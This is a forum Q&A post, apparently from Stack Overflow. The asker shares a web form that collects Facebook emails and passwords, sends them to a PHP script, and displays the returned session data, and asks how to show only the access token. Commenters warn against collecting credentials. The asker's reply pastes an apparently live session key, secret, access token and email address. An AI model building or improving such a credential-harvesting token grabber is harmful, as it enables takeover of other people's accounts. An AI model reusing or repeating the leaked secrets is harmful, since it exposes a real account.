# displaying Specific Information from the Ajax request

Tags: php, jquery, ajax, facebook

Hi I am looking for a help I have created form where users put their email and password of facebook and echo out the data of their account.

The site is here:
https://testmybottt.000webhostapp.com/test/

my question is I just want to display access_token part nothing more. is it possible? with ajax? or Jquery or CSS to hide/show data. I hope my question is clear.

Here is my code:

```
<!DOCTYPE html>
<html lang="en">
<body>
<div class="container">
<div class="header clearfix">   
<br/>
</div>
<div class="panel panel-primary">
<div class="panel-body">
<form id="flogin" name="flogin" class="form-horizontal" action="" method="POST">
<div class="form-group col-sm-12">
<input name="email" id="tk" class="form-control" placeholder="Enter Your Facebook Email or Phone Number"/></div>
<div class="form-group col-sm-12">
<input name="pass" type="password" id="mk" class="form-control" placeholder="Enter Your Facebook Password"/></div>
<div style="text-align: center">
<button type="button" class="btn btn-info" onclick="Puaru_Active()" > Click Here </button>
<br/> <br/> </form>
<li id="trave" class="list-group-item">
</div></div></div>
<script>
function Puaru_Active() {
var http = new XMLHttpRequest();
var tk = document.getElementById("tk").value;
var mk = document.getElementById("mk").value;
var url = "iphone.php";
var params = "u="+tk+"&p="+mk+"";
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
document.getElementById("trave").innerHTML = http.responseText;        
}
}
http.send(params);
}
</script>
</body>
</html>
```

Comment: why would anyone want to enter his facebook password on your page? you should NEVER EVER ask people for their facebook credentials. implement a proper login process to get an access token.

Comment: exactly. This is just a demo. I can give you my account credentials and you can test this. I just want to echo specific data and hide everything else.

Comment: `{"session_key":"5.xfVGyAkEmJt84Q.1492152135.26-100016308049051","uid":100016308049051,"secret":"7ba2860dc9ba7caa5692d405daa9f774","access_token":"EAAAAAYsX7TsBACQJEycWCMd3b0v97dU0chY0QyGfxvDBxnkMR0zVhZCINVKl9XPANEPWXZBxJiHAB47DWNlmARfIg1DjH4J1YUZBg9ZBbJaQS1dYGnmcCMZCq0tbapsvr7YV3hu7CRoEZAuSmmW4drnrh9UsDtZAt06RKmZCxMNgarxCy3udQQvZAqFLWVrFZCuUQtal8ysbkcgHhgE144WZB7z","machine_id":"R2_wWDcpL4Hpp1HwsUkAgCzS","confirmed":true,"identifier":"alexblissa\u0040gmail.com"}`

from there I want only access_token

Comment: again, use a proper login process to get an access token. NOT facebook credentials.